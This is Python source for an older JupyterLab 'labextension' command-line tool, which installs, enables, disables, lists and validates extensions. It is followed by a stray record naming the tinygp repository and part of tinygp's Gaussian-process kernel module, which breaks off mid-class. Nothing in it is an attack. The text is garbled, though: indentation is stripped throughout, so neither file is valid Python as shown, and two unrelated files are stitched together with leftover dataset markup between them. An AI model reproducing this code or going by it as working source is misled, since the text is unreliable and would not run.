from tornado.log import LogFormatter
from . import (
get_labextension_manifest_data_by_folder,
)
# Constants for pretty print extension listing function.
# Window doesn't support coloring in the commandline
GREEN_ENABLED = '\033[32m enabled \033[0m' if os.name != 'nt' else 'enabled '
RED_DISABLED = '\033[31mdisabled\033[0m' if os.name != 'nt' else 'disabled'
GREEN_OK = '\033[32mOK\033[0m' if os.name != 'nt' else 'ok'
RED_X = '\033[31m X\033[0m' if os.name != 'nt' else ' X'
#------------------------------------------------------------------------------
# Public API
#------------------------------------------------------------------------------
class ArgumentConflict(ValueError):
pass
def check_labextension(files, user=False, prefix=None, labextensions_dir=None, sys_prefix=False):
"""Check whether labextension files have been installed
Returns True if all files are found, False if any are missing.
Parameters
----------
files : list(paths)
a list of relative paths within labextensions.
user : bool [default: False]
Whether to check the user's .jupyter/labextensions directory.
Otherwise check a system-wide install (e.g. /usr/local/share/jupyter/labextensions).
prefix : str [optional]
Specify install prefix, if it should differ from default (e.g. /usr/local).
Will check prefix/share/jupyter/labextensions
labextensions_dir : str [optional]
Specify absolute path of labextensions directory explicitly.
sys_prefix : bool [default: False]
Install into the sys.prefix, i.e. environment
"""
labext = _get_labextension_dir(user=user, sys_prefix=sys_prefix, prefix=prefix, labextensions_dir=labextensions_dir)
# make sure labextensions dir exists
if not os.path.exists(labext):
return False
if isinstance(files, string_types):
# one file given, turn it into a list
files = [files]
return all(os.path.exists(pjoin(labext, f)) for f in files)
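# Illustrative sketch (extension name and file are hypothetical): returns True
# only when every listed path exists under the resolved labextensions dir.
#
#   check_labextension(['mockextension/index.js'], sys_prefix=True)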
def install_labextension(path, name, overwrite=False, symlink=False,
user=False, prefix=None, labextensions_dir=None,
logger=None, sys_prefix=False
):
"""Install a Javascript extension for JupyterLab
Stages files and/or directories into the labextensions directory.
By default, this compares modification time, and only stages files that need updating.
If `overwrite` is specified, matching files are purged before proceeding.
Parameters
----------
path : path to file, directory, zip or tarball archive, or URL to install
Archives (zip or tarballs) will be extracted into the labextensions directory.
name : str
name the labextension is installed to. For example, if name is 'foo', then
the source file will be installed to 'labextensions/foo'.
overwrite : bool [default: False]
If True, always install the files, regardless of what may already be installed.
symlink : bool [default: False]
If True, create a symlink in labextensions, rather than copying files.
Not allowed with URLs or archives. Windows support for symlinks requires
Vista or above, Python 3, and a permission bit which only admin users
have by default, so don't rely on it.
user : bool [default: False]
Whether to install to the user's labextensions directory.
Otherwise do a system-wide install (e.g. /usr/local/share/jupyter/labextensions).
prefix : str [optional]
Specify install prefix, if it should differ from default (e.g. /usr/local).
Will install to ``<prefix>/share/jupyter/labextensions``
labextensions_dir : str [optional]
Specify absolute path of labextensions directory explicitly.
logger : Jupyter logger [optional]
Logger instance to use
sys_prefix : bool [default: False]
Install into the sys.prefix, i.e. environment
"""
# the actual path to which we eventually installed
full_dest = None
labext = _get_labextension_dir(user=user, sys_prefix=sys_prefix, prefix=prefix, labextensions_dir=labextensions_dir)
# make sure labextensions dir exists
ensure_dir_exists(labext)
# forcing symlink parameter to False if os.symlink does not exist (e.g., on Windows machines running python 2)
if not hasattr(os, 'symlink'):
symlink = False
if isinstance(path, (list, tuple)):
raise TypeError("path must be a string pointing to a single extension to install; call this function multiple times to install multiple extensions")
path = cast_unicode_py2(path)
if path.startswith(('https://', 'http://')):
raise NotImplementedError('Urls are not yet supported for labextensions')
elif path.endswith('.zip') or _safe_is_tarfile(path):
raise NotImplementedError('Archive files are not yet supported for labextensions')
else:
destination = cast_unicode_py2(name)
full_dest = normpath(pjoin(labext, destination))
if overwrite and os.path.lexists(full_dest):
if logger:
logger.info("Removing: %s" % full_dest)
if os.path.isdir(full_dest) and not os.path.islink(full_dest):
shutil.rmtree(full_dest)
else:
os.remove(full_dest)
if symlink:
path = os.path.abspath(path)
if not os.path.exists(full_dest):
if logger:
logger.info("Symlinking: %s -> %s" % (full_dest, path))
os.symlink(path, full_dest)
elif os.path.isdir(path):
path = pjoin(os.path.abspath(path), '') # end in path separator
for parent, dirs, files in os.walk(path):
dest_dir = pjoin(full_dest, parent[len(path):])
if not os.path.exists(dest_dir):
if logger:
logger.info("Making directory: %s" % dest_dir)
os.makedirs(dest_dir)
for file in files:
src = pjoin(parent, file)
dest_file = pjoin(dest_dir, file)
_maybe_copy(src, dest_file, logger=logger)
else:
src = path
_maybe_copy(src, full_dest, logger=logger)
return full_dest
def install_labextension_python(module, overwrite=False, symlink=False,
user=False, sys_prefix=False, prefix=None, labextensions_dir=None, logger=None):
"""Install a labextension bundled in a Python package.
Returns a list of installed/updated directories.
See install_labextension for parameter information."""
m, labexts = _get_labextension_metadata(module)
base_path = os.path.split(m.__file__)[0]
full_dests = []
for labext in labexts:
src = os.path.join(base_path, labext['src'])
name = labext['name']
if logger:
logger.info("Installing %s -> %s" % (src, name))
full_dest = install_labextension(
src, name=name, overwrite=overwrite, symlink=symlink,
user=user, sys_prefix=sys_prefix, prefix=prefix, labextensions_dir=labextensions_dir,
logger=logger
)
validate_labextension_folder(name, full_dest, logger)
full_dests.append(full_dest)
return full_dests
def uninstall_labextension(name, user=False, sys_prefix=False, prefix=None,
labextensions_dir=None, logger=None):
"""Uninstall a Javascript extension of JupyterLab
Removes staged files and/or directories in the labextensions directory and
removes the extension from the frontend config.
Parameters
----------
name: str
The name of the labextension.
user : bool [default: False]
Whether to uninstall from the user's labextensions directory.
Otherwise do a system-wide uninstall (e.g. /usr/local/share/jupyter/labextensions).
sys_prefix : bool [default: False]
Uninstall from the sys.prefix, i.e. environment
prefix : str [optional]
Specify prefix, if it should differ from default (e.g. /usr/local).
Will uninstall from ``<prefix>/share/jupyter/labextensions``
labextensions_dir : str [optional]
Specify absolute path of labextensions directory explicitly.
logger : Jupyter logger [optional]
Logger instance to use
"""
labext = _get_labextension_dir(user=user, sys_prefix=sys_prefix, prefix=prefix, labextensions_dir=labextensions_dir)
dest = cast_unicode_py2(name)
full_dest = pjoin(labext, dest)
if os.path.lexists(full_dest):
if logger:
logger.info("Removing: %s" % full_dest)
if os.path.isdir(full_dest) and not os.path.islink(full_dest):
shutil.rmtree(full_dest)
else:
os.remove(full_dest)
disable_labextension(name, user=user, sys_prefix=sys_prefix,
logger=logger)
def uninstall_labextension_python(module,
user=False, sys_prefix=False, prefix=None, labextensions_dir=None,
logger=None):
"""Uninstall a labextension bundled in a Python package.
See parameters of `install_labextension_python`
"""
m, labexts = _get_labextension_metadata(module)
for labext in labexts:
name = labext['name']
if logger:
logger.info("Uninstalling {}".format(name))
uninstall_labextension(name, user=user, sys_prefix=sys_prefix,
prefix=prefix, labextensions_dir=labextensions_dir, logger=logger)
def _set_labextension_state(name, state,
user=True, sys_prefix=False, logger=None):
"""Set whether the JupyterLab frontend should use the named labextension
Returns True if the final state is the one requested.
Parameters
name : string
The name of the extension.
state : bool
The state in which to leave the extension
user : bool [default: True]
Whether to update the user's .jupyter/labextensions directory
sys_prefix : bool [default: False]
Whether to update the sys.prefix, i.e. environment. Will override
`user`.
logger : Jupyter logger [optional]
Logger instance to use
"""
user = False if sys_prefix else user
config_dir = os.path.join(
_get_config_dir(user=user, sys_prefix=sys_prefix), 'labconfig')
cm = BaseJSONConfigManager(config_dir=config_dir)
if logger:
logger.info("{} extension {}...".format(
"Enabling" if state else "Disabling",
name
))
cfg = cm.get("jupyterlab_config")
labextensions = (
cfg.setdefault("LabApp", {})
.setdefault("labextensions", {})
)
old_enabled = labextensions.get(name, None)
new_enabled = state if state is not None else not old_enabled
if logger:
if new_enabled:
logger.info(u"Enabling: %s" % (name))
else:
logger.info(u"Disabling: %s" % (name))
labextensions[name] = new_enabled
if logger:
logger.info(u"- Writing config: {}".format(config_dir))
cm.update("jupyterlab_config", cfg)
if new_enabled:
validate_labextension(name, logger=logger)
return old_enabled == state
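# Sketch of the resulting file: after a successful call,
# <config_dir>/labconfig/jupyterlab_config.json holds a block like the
# following (the extension name is hypothetical):
#
#   {
#     "LabApp": {
#       "labextensions": {
#         "mockextension": true
#       }
#     }
#   }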
def _set_labextension_state_python(state, module, user, sys_prefix,
logger=None):
"""Enable or disable some labextensions stored in a Python package
Returns a list of whether the state was achieved (i.e. changed, or was
already right)
Parameters
----------
state : Bool
Whether the extensions should be enabled
module : str
Importable Python module exposing the
magic-named `_jupyter_labextension_paths` function
user : bool
Whether to enable in the user's labextensions directory.
sys_prefix : bool
Enable/disable in the sys.prefix, i.e. environment
logger : Jupyter logger [optional]
Logger instance to use
"""
m, labexts = _get_labextension_metadata(module)
return [_set_labextension_state(name=labext["name"],
state=state,
user=user, sys_prefix=sys_prefix,
logger=logger)
for labext in labexts]
def enable_labextension(name, user=True, sys_prefix=False,
logger=None):
"""Enable a named labextension
Returns True if the final state is the one requested.
Parameters
----------
name : string
The name of the extension.
user : bool [default: True]
Whether to enable in the user's labextensions directory.
sys_prefix : bool [default: False]
Whether to enable in the sys.prefix, i.e. environment. Will override
`user`
logger : Jupyter logger [optional]
Logger instance to use
"""
return _set_labextension_state(name=name,
state=True,
user=user, sys_prefix=sys_prefix,
logger=logger)
def disable_labextension(name, user=True, sys_prefix=False,
logger=None):
"""Disable a named labextension
Returns True if the final state is the one requested.
Parameters
----------
name : string
The name of the extension.
user : bool [default: True]
Whether to enable in the user's labextensions directory.
sys_prefix : bool [default: False]
Whether to enable in the sys.prefix, i.e. environment. Will override
`user`.
logger : Jupyter logger [optional]
Logger instance to use
"""
return _set_labextension_state(name=name,
state=False,
user=user, sys_prefix=sys_prefix,
logger=logger)
def enable_labextension_python(module, user=True, sys_prefix=False,
logger=None):
"""Enable some labextensions associated with a Python module.
Returns a list of whether the state was achieved (i.e. changed, or was
already right)
Parameters
----------
module : str
Importable Python module exposing the
magic-named `_jupyter_labextension_paths` function
user : bool [default: True]
Whether to enable in the user's labextensions directory.
sys_prefix : bool [default: False]
Whether to enable in the sys.prefix, i.e. environment. Will override
`user`
logger : Jupyter logger [optional]
Logger instance to use
"""
return _set_labextension_state_python(True, module, user, sys_prefix,
logger=logger)
def disable_labextension_python(module, user=True, sys_prefix=False,
logger=None):
"""Disable some labextensions associated with a Python module.
Returns True if the final state is the one requested.
Parameters
----------
module : str
Importable Python module exposing the
magic-named `_jupyter_labextension_paths` function
user : bool [default: True]
Whether to enable in the user's labextensions directory.
sys_prefix : bool [default: False]
Whether to enable in the sys.prefix, i.e. environment
logger : Jupyter logger [optional]
Logger instance to use
"""
return _set_labextension_state_python(False, module, user, sys_prefix,
logger=logger)
def validate_labextension(name, logger=None):
"""Validate a named labextension.
Looks across all of the labextension directories.
Returns a list of warnings.
Parameters
----------
name : str
The name of the extension.
logger : Jupyter logger [optional]
Logger instance to use
"""
for exts in _labextension_dirs():
full_dest = os.path.join(exts, name)
if os.path.exists(full_dest):
return validate_labextension_folder(name, full_dest, logger)
def validate_labextension_folder(name, full_dest, logger=None):
"""Assess the health of an installed labextension
Returns a list of warnings.
Parameters
----------
full_dest : str
The on-disk location of the installed labextension: this should end
with `labextensions/<name>`
logger : Jupyter logger [optional]
Logger instance to use
"""
if logger:
logger.info(" - Validating...")
infos = []
warnings = []
hasFiles = True
hasEntry = False
data = get_labextension_manifest_data_by_folder(full_dest)
for manifest in data.values():
if ('entry' in manifest and 'modules' in manifest):
if (manifest['entry'] in manifest['modules']):
hasEntry = True
files = manifest.get('files', [])
if not files:
hasFiles = False
for fname in files:
path = os.path.join(full_dest, fname)
if not os.path.exists(path):
hasFiles = False
entry_msg = u" {} has {} entry point?"
name = os.path.basename(full_dest)
if hasEntry:
        infos.append(entry_msg.format(GREEN_OK, name))
else:
warnings.append(entry_msg.format(RED_X, name))
files_msg = u" {} has necessary files?"
if hasFiles:
infos.append(files_msg.format(GREEN_OK, name))
else:
warnings.append(files_msg.format(RED_X, name))
post_mortem = u" {} {} {}"
if logger:
if warnings:
[logger.info(info) for info in infos]
[logger.warn(warning) for warning in warnings]
else:
logger.info(post_mortem.format(name, "", GREEN_OK))
return warnings
#----------------------------------------------------------------------
# Applications
#----------------------------------------------------------------------
from traitlets import Bool, Unicode
from jupyter_core.application import JupyterApp
_base_flags = {}
_base_flags.update(JupyterApp.flags)
_base_flags.pop("y", None)
_base_flags.pop("generate-config", None)
_base_flags.update({
"user" : ({
"BaseLabExtensionApp" : {
"user" : True,
}}, "Apply the operation only for the given user"
),
"system" : ({
"BaseLabExtensionApp" : {
"user" : False,
"sys_prefix": False,
}}, "Apply the operation system-wide"
),
"sys-prefix" : ({
"BaseLabExtensionApp" : {
"sys_prefix" : True,
}}, "Use sys.prefix as the prefix for installing labextensions (for environments, packaging)"
),
"py" : ({
"BaseLabExtensionApp" : {
"python" : True,
}}, "Install from a Python package"
)
})
_base_flags['python'] = _base_flags['py']
class BaseLabExtensionApp(JupyterApp):
"""Base labextension installer app"""
_log_formatter_cls = LogFormatter
flags = _base_flags
version = __version__
user = Bool(False, config=True, help="Whether to do a user install")
sys_prefix = Bool(False, config=True, help="Use the sys.prefix as the prefix")
python = Bool(False, config=True, help="Install from a Python package")
def _log_format_default(self):
"""A default format for messages"""
return "%(message)s"
flags = {}
flags.update(_base_flags)
flags.update({
"overwrite" : ({
"InstallLabExtensionApp" : {
"overwrite" : True,
}}, "Force overwrite of existing files"
),
"symlink" : ({
"InstallLabExtensionApp" : {
"symlink" : True,
}}, "Create symlink instead of copying files"
),
})
flags['s'] = flags['symlink']
aliases = {
"prefix" : "InstallLabExtensionApp.prefix",
"labextensions" : "InstallLabExtensionApp.labextensions_dir",
}
class InstallLabExtensionApp(BaseLabExtensionApp):
"""Entry point for installing JupyterLab extensions"""
description = """Install JupyterLab extensions
Usage
jupyter labextension install /path/to/myextension myextension [--user|--sys-prefix]
jupyter labextension install --py myextensionPyPackage [--user|--sys-prefix]
This copies a file or a folder into the Jupyter labextensions directory.
    URLs and archives (zip or tarballs) are not yet supported.
If the requested files are already up to date, no action is taken
unless --overwrite is specified.
"""
examples = """
jupyter labextension install /path/to/myextension myextension
jupyter labextension install --py myextensionPyPackage
"""
aliases = aliases
flags = flags
overwrite = Bool(False, config=True, help="Force overwrite of existing files")
symlink = Bool(False, config=True, help="Create symlinks instead of copying files")
prefix = Unicode('', config=True, help="Installation prefix")
labextensions_dir = Unicode('', config=True,
help="Full path to labextensions dir (probably use prefix or user)")
def _config_file_name_default(self):
"""The default config file name."""
return 'jupyterlab_config'
def install_extensions(self):
"""Perform the installation of labextension(s)"""
if self.python:
if len(self.extra_args) > 1:
raise ValueError("Only one labextension allowed at a time. "
"Call multiple times to install multiple extensions.")
install = install_labextension_python
kwargs = {}
else:
if len(self.extra_args) > 2:
raise ValueError("Only one labextension allowed at a time. "
"Call multiple times to install multiple extensions.")
install = install_labextension
kwargs = {'name': self.extra_args[1]}
full_dests = install(self.extra_args[0],
overwrite=self.overwrite,
symlink=self.symlink,
user=self.user,
sys_prefix=self.sys_prefix,
prefix=self.prefix,
labextensions_dir=self.labextensions_dir,
logger=self.log,
**kwargs
)
if full_dests:
self.log.info(
u"\nTo enable this labextension in the browser every time"
" JupyterLab loads:\n\n"
" jupyter labextension enable {}{}{}{}\n".format(
self.extra_args[0] if self.python else self.extra_args[1],
" --user" if self.user else "",
" --py" if self.python else "",
" --sys-prefix" if self.sys_prefix else ""
)
)
def start(self):
"""Perform the App's function as configured"""
if not self.extra_args:
sys.exit('Please specify a labextension to install')
else:
try:
self.install_extensions()
except ArgumentConflict as e:
sys.exit(str(e))
class UninstallLabExtensionApp(BaseLabExtensionApp):
"""Entry point for uninstalling JupyterLab extensions"""
version = __version__
description = """Uninstall Jupyterlab extensions
Usage
jupyter labextension uninstall myextension
jupyter labextension uninstall --py myextensionPyPackage
This uninstalls a labextension.
"""
examples = """
jupyter labextension uninstall myextension
jupyter labextension uninstall --py myextensionPyPackage
"""
aliases = {
"prefix" : "UninstallLabExtensionApp.prefix",
"labextensions" : "UninstallLabExtensionApp.labextensions_dir",
"name": "UninstallLabExtensionApp.name",
}
prefix = Unicode('', config=True, help="Installation prefix")
labextensions_dir = Unicode('', config=True, help="Full path to labextensions dir (probably use prefix or user)")
name = Unicode('', config=True, help="The name of the extension.")
def _config_file_name_default(self):
"""The default config file name."""
return 'jupyterlab_config'
def uninstall_extensions(self):
"""Uninstall some labextensions"""
kwargs = {
'user': self.user,
'sys_prefix': self.sys_prefix,
'prefix': self.prefix,
'labextensions_dir': self.labextensions_dir,
'logger': self.log
}
arg_count = 1
if len(self.extra_args) > arg_count:
raise ValueError("only one labextension allowed at a time. Call multiple times to uninstall multiple extensions.")
if len(self.extra_args) < arg_count:
raise ValueError("not enough arguments")
if self.python:
uninstall_labextension_python(self.extra_args[0], **kwargs)
else:
uninstall_labextension(self.extra_args[0], **kwargs)
def start(self):
if not self.extra_args:
sys.exit('Please specify a labextension to uninstall')
else:
try:
self.uninstall_extensions()
except ArgumentConflict as e:
sys.exit(str(e))
class ToggleLabExtensionApp(BaseLabExtensionApp):
"""A base class for apps that enable/disable extensions"""
name = "jupyter labextension enable/disable"
version = __version__
description = "Enable/disable a labextension in configuration."
user = Bool(True, config=True, help="Apply the configuration only for the current user (default)")
_toggle_value = None
def _config_file_name_default(self):
"""The default config file name."""
return 'jupyterlab_config'
def toggle_labextension_python(self, module):
"""Toggle some extensions in an importable Python module.
Returns a list of booleans indicating whether the state was changed as
requested.
Parameters
----------
module : str
Importable Python module exposing the
magic-named `_jupyter_labextension_paths` function
"""
toggle = (enable_labextension_python if self._toggle_value
else disable_labextension_python)
return toggle(module,
user=self.user,
sys_prefix=self.sys_prefix,
logger=self.log)
def toggle_labextension(self, name):
"""Toggle some a named labextension by require-able AMD module.
Returns whether the state was changed as requested.
Parameters
----------
require : str
require.js path used to load the labextension
"""
toggle = (enable_labextension if self._toggle_value
else disable_labextension)
return toggle(name,
user=self.user, sys_prefix=self.sys_prefix,
logger=self.log)
def start(self):
if not self.extra_args:
sys.exit('Please specify a labextension/package to enable or disable')
elif len(self.extra_args) > 1:
sys.exit('Please specify one labextension/package at a time')
if self.python:
self.toggle_labextension_python(self.extra_args[0])
else:
self.toggle_labextension(self.extra_args[0])
class EnableLabExtensionApp(ToggleLabExtensionApp):
"""An App that enables labextensions"""
name = "jupyter labextension enable"
description = """
Enable a labextension in frontend configuration.
Usage
jupyter labextension enable myextension [--system|--sys-prefix]
"""
_toggle_value = True
class DisableLabExtensionApp(ToggleLabExtensionApp):
"""An App that disables labextensions"""
name = "jupyter labextension disable"
description = """
    Disable a labextension in frontend configuration.
Usage
jupyter labextension disable myextension [--system|--sys-prefix]
"""
_toggle_value = None
class ListLabExtensionsApp(BaseLabExtensionApp):
"""An App that lists and validates labextensions"""
name = "jupyter labextension list"
version = __version__
description = "List all labextensions known by the configuration system"
def list_labextensions(self):
"""List all the labextensions"""
config_dirs = [os.path.join(p, 'labconfig') for p in jupyter_config_path()]
print("Known labextensions:")
for config_dir in config_dirs:
cm = BaseJSONConfigManager(parent=self, config_dir=config_dir)
data = cm.get("jupyterlab_config")
labextensions = (
data.setdefault("LabApp", {})
.setdefault("labextensions", {})
)
if labextensions:
print(u'config dir: {}'.format(config_dir))
for name, enabled in labextensions.items():
print(u' {} {}'.format(
name,
GREEN_ENABLED if enabled else RED_DISABLED))
validate_labextension(name, self.log)
def start(self):
"""Perform the App's functions as configured"""
self.list_labextensions()
_examples = """
jupyter labextension list # list all configured labextensions
jupyter labextension install --py <packagename> # install a labextension from a Python package
jupyter labextension enable --py <packagename> # enable all labextensions in a Python package
jupyter labextension disable --py <packagename> # disable all labextensions in a Python package
jupyter labextension uninstall --py <packagename> # uninstall a labextension in a Python package
"""
class LabExtensionApp(BaseLabExtensionApp):
"""Base jupyter labextension command entry point"""
name = "jupyter labextension"
version = __version__
description = "Work with JupyterLab extensions"
examples = _examples
subcommands = dict(
install=(InstallLabExtensionApp, "Install a labextension"),
enable=(EnableLabExtensionApp, "Enable a labextension"),
disable=(DisableLabExtensionApp, "Disable a labextension"),
uninstall=(UninstallLabExtensionApp, "Uninstall a labextension"),
list=(ListLabExtensionsApp, "List labextensions")
)
def start(self):
"""Perform the App's functions as configured"""
super(LabExtensionApp, self).start()
        # The above should have called a subcommand and raised NoStart; if we
        # get here, it didn't, so we print the list of subcommands and exit.
subcmds = ", ".join(sorted(self.subcommands))
sys.exit("Please supply at least one subcommand: %s" % subcmds)
main = LabExtensionApp.launch_instance
#------------------------------------------------------------------------------
# Private API
#------------------------------------------------------------------------------
def _should_copy(src, dest, logger=None):
"""Should a file be copied, if it doesn't exist, or is newer?
Returns whether the file needs to be updated.
Parameters
----------
src : string
A path that should exist from which to copy a file
src : string
A path that might exist to which to copy a file
logger : Jupyter logger [optional]
Logger instance to use
"""
if not os.path.exists(dest):
return True
if os.stat(src).st_mtime - os.stat(dest).st_mtime > 1e-6:
# we add a fudge factor to work around a bug in python 2.x
# that was fixed in python 3.x: http://bugs.python.org/issue12904
if logger:
logger.warn("Out of date: %s" % dest)
return True
if logger:
logger.info("Up to date: %s" % dest)
return False
def _maybe_copy(src, dest, logger=None):
"""Copy a file if it needs updating.
Parameters
----------
src : string
A path that should exist from which to copy a file
    dest : string
A path that might exist to which to copy a file
logger : Jupyter logger [optional]
Logger instance to use
"""
if _should_copy(src, dest, logger=logger):
if logger:
logger.info("Copying: %s -> %s" % (src, dest))
shutil.copy2(src, dest)
def _safe_is_tarfile(path):
"""Safe version of is_tarfile, return False on IOError.
Returns whether the file exists and is a tarfile.
Parameters
----------
path : string
A path that might not exist and or be a tarfile
"""
try:
return tarfile.is_tarfile(path)
except IOError:
return False
def _get_labextension_dir(user=False, sys_prefix=False, prefix=None, labextensions_dir=None):
"""Return the labextension directory specified
Parameters
----------
user : bool [default: False]
Get the user's .jupyter/labextensions directory
sys_prefix : bool [default: False]
Get sys.prefix, i.e. ~/.envs/my-env/share/jupyter/labextensions
prefix : str [optional]
Get custom prefix
labextensions_dir : str [optional]
        Specify the labextensions directory explicitly
"""
if sum(map(bool, [user, prefix, labextensions_dir, sys_prefix])) > 1:
raise ArgumentConflict("cannot specify more than one of user, sys_prefix, prefix, or labextensions_dir")
if user:
labext = pjoin(jupyter_data_dir(), u'labextensions')
elif sys_prefix:
labext = pjoin(ENV_JUPYTER_PATH[0], u'labextensions')
elif prefix:
labext = pjoin(prefix, 'share', 'jupyter', 'labextensions')
elif labextensions_dir:
labext = labextensions_dir
else:
labext = pjoin(SYSTEM_JUPYTER_PATH[0], 'labextensions')
return labext
def _labextension_dirs():
"""The possible locations of labextensions.
Returns a list of known base extension locations
"""
return [
pjoin(jupyter_data_dir(), u'labextensions'),
pjoin(ENV_JUPYTER_PATH[0], u'labextensions'),
pjoin(SYSTEM_JUPYTER_PATH[0], 'labextensions')
]
def _get_config_dir(user=False, sys_prefix=False):
"""Get the location of config files for the current context
    Returns the path to the config directory for the current context
Parameters
----------
user : bool [default: False]
Get the user's .jupyter config directory
sys_prefix : bool [default: False]
Get sys.prefix, i.e. ~/.envs/my-env/etc/jupyter
"""
user = False if sys_prefix else user
if user and sys_prefix:
raise ArgumentConflict("Cannot specify more than one of user or sys_prefix")
if user:
labext = jupyter_config_dir()
elif sys_prefix:
labext = ENV_CONFIG_PATH[0]
else:
labext = SYSTEM_CONFIG_PATH[0]
return labext
def _get_labextension_metadata(module):
"""Get the list of labextension paths associated with a Python module.
Returns a tuple of (the module, [{
'name': 'mockextension',
'src': 'static',
}])
Parameters
----------
module : str
Importable Python module exposing the
magic-named `_jupyter_labextension_paths` function
"""
m = import_item(module)
if not hasattr(m, '_jupyter_labextension_paths'):
raise KeyError('The Python module {} is not a valid labextension'.format(module))
labexts = m._jupyter_labextension_paths()
return m, labexts
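# Illustrative sketch: a package advertises its labextension through the
# magic-named function (package and extension names are hypothetical):
#
#   # mypackage/__init__.py
#   def _jupyter_labextension_paths():
#       return [{
#           'name': 'mockextension',  # installs to labextensions/mockextension
#           'src': 'static',          # copied from mypackage/static
#       }]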
def _read_config_data(user=False, sys_prefix=False):
"""Get the config for the current context
    Returns the parsed config data for the current context
Parameters
----------
user : bool [default: False]
Get the user's .jupyter config directory
sys_prefix : bool [default: False]
Get sys.prefix, i.e. ~/.envs/my-env/etc/jupyter
"""
config_dir = _get_config_dir(user=user, sys_prefix=sys_prefix)
config_man = BaseJSONConfigManager(config_dir=config_dir)
return config_man.get('jupyterlab_config')
def _write_config_data(data, user=False, sys_prefix=False):
"""Update the config for the current context
Parameters
----------
data : object
An object which can be accepted by ConfigManager.update
user : bool [default: False]
Get the user's .jupyter config directory
sys_prefix : bool [default: False]
Get sys.prefix, i.e. ~/.envs/my-env/etc/jupyter
"""
config_dir = _get_config_dir(user=user, sys_prefix=sys_prefix)
config_man = BaseJSONConfigManager(config_dir=config_dir)
config_man.update('jupyterlab_config', data)
if __name__ == '__main__':
main()
``` |
{
"source": "0x0L/tinygp",
"score": 3
} |
#### File: tinygp/kernels/base.py
```python
from __future__ import annotations
__all__ = [
"Kernel",
"Conditioned",
"Custom",
"Sum",
"Product",
"Constant",
"DotProduct",
"Polynomial",
]
from abc import ABCMeta, abstractmethod
from typing import TYPE_CHECKING, Any, Callable, Optional, Sequence, Union
import jax
import jax.numpy as jnp
from tinygp.helpers import JAXArray, dataclass
if TYPE_CHECKING:
from tinygp.solvers.solver import Solver
Axis = Union[int, Sequence[int]]
class Kernel(metaclass=ABCMeta):
"""The base class for all kernel implementations
    This base class provides default implementations to add and multiply kernels.
Subclasses should accept parameters in their ``__init__`` and then override
:func:`Kernel.evaluate` with custom behavior.
"""
if TYPE_CHECKING:
def __init__(self, *args: Any, **kwargs: Any) -> None:
pass
@abstractmethod
def evaluate(self, X1: JAXArray, X2: JAXArray) -> JAXArray:
"""Evaluate the kernel at a pair of input coordinates
This should be overridden be subclasses to return the kernel-specific
value. Two things to note:
1. Users shouldn't generally call :func:`Kernel.evaluate`. Instead,
always "call" the kernel instance directly; for example, you can
evaluate the Matern-3/2 kernel using ``Matern32(1.5)(x1, x2)``, for
arrays of input coordinates ``x1`` and ``x2``.
2. When implementing a custom kernel, this method should treat ``X1``
and ``X2`` as single datapoints. In other words, these inputs will
typically either be scalars of have shape ``n_dim``, where ``n_dim``
is the number of input dimensions, rather than ``n_data`` or
``(n_data, n_dim)``, and you should let the :class:`Kernel` ``vmap``
magic handle all the broadcasting for you.
"""
raise NotImplementedError
def evaluate_diag(self, X: JAXArray) -> JAXArray:
"""Evaluate the kernel on its diagonal
The default implementation simply calls :func:`Kernel.evaluate` with
``X`` as both arguments, but subclasses can use this to make diagonal
        calculations more efficient.
"""
return self.evaluate(X, X)
def matmul(
self,
X1: JAXArray,
X2: Optional[JAXArray] = None,
y: Optional[JAXArray] = None,
) -> JAXArray:
if y is None:
assert X2 is not None
y = X2
X2 = None
if X2 is None:
X2 = X1
return jnp.dot(self(X1, X2), y)
def __call__(
self, X1: JAXArray, X2: Optional[JAXArray] = None
) -> JAXArray:
if X2 is None:
k = jax.vmap(self.evaluate_diag, in_axes=0)(X1)
if k.ndim != 1:
raise ValueError(
"Invalid kernel diagonal shape: "
f"expected ndim = 1, got ndim={k.ndim} "
"check the dimensions of parameters and custom kernels"
)
return k
k = jax.vmap(
jax.vmap(self.evaluate, in_axes=(None, 0)), in_axes=(0, None)
)(X1, X2)
if k.ndim != 2:
raise ValueError(
"Invalid kernel shape: "
f"expected ndim = 2, got ndim={k.ndim} "
"check the dimensions of parameters and custom kernels"
)
return k
def __add__(self, other: Union["Kernel", JAXArray]) -> "Kernel":
if isinstance(other, Kernel):
return Sum(self, other)
return Sum(self, Constant(other))
def __radd__(self, other: Union["Kernel", JAXArray]) -> "Kernel":
if isinstance(other, Kernel):
return Sum(other, self)
return Sum(Constant(other), self)
def __mul__(self, other: Union["Kernel", JAXArray]) -> "Kernel":
if isinstance(other, Kernel):
return Product(self, other)
return Product(self, Constant(other))
def __rmul__(self, other: Union["Kernel", JAXArray]) -> "Kernel":
if isinstance(other, Kernel):
return Product(other, self)
return Product(Constant(other), self)
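# Illustrative sketch of kernel arithmetic (assumes a stationary kernel such
# as tinygp.kernels.ExpSquared; scalars are promoted to Constant):
#
#   kernel = 1.5 * ExpSquared() + Constant(0.1)
#   K = kernel(x1, x2)  # dense (n1, n2) matrix, broadcast via vmap
#   d = kernel(x1)      # diagonal only, shape (n1,)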
@dataclass
class Conditioned(Kernel):
"""A kernel used when conditioning a process on data
Args:
X: The coordinates of the data.
        solver: The solver built from the base process' kernel matrix; its
            triangular solves are used to condition the kernel.
        kernel: The predictive kernel; this will generally be the kernel
            used by the original process.
"""
X: JAXArray
solver: Solver
kernel: Kernel
def evaluate(self, X1: JAXArray, X2: JAXArray) -> JAXArray:
kernel_vec = jax.vmap(self.kernel.evaluate, in_axes=(0, None))
K1 = self.solver.solve_triangular(kernel_vec(self.X, X1))
K2 = self.solver.solve_triangular(kernel_vec(self.X, X2))
return self.kernel.evaluate(X1, X2) - K1.transpose() @ K2
def evaluate_diag(self, X: JAXArray) -> JAXArray:
kernel_vec = jax.vmap(self.kernel.evaluate, in_axes=(0, None))
K = self.solver.solve_triangular(kernel_vec(self.X, X))
return self.kernel.evaluate_diag(X) - K.transpose() @ K
@dataclass
class Custom(Kernel):
"""A custom kernel class implemented as a callable
Args:
function: A callable with a signature and behavior that matches
:func:`Kernel.evaluate`.
"""
function: Callable[[Any, Any], Any]
def evaluate(self, X1: JAXArray, X2: JAXArray) -> JAXArray:
return self.function(X1, X2) # type: ignore
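# Illustrative sketch: wrap a plain function as a kernel. The callable sees
# single datapoints; __call__ handles broadcasting over datasets:
#
#   k = Custom(lambda X1, X2: jnp.exp(-jnp.abs(X1 - X2)))
#   K = k(x1, x2)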
@dataclass
class Sum(Kernel):
"""A helper to represent the sum of two kernels"""
kernel1: Kernel
kernel2: Kernel
def evaluate(self, X1: JAXArray, X2: JAXArray) -> JAXArray:
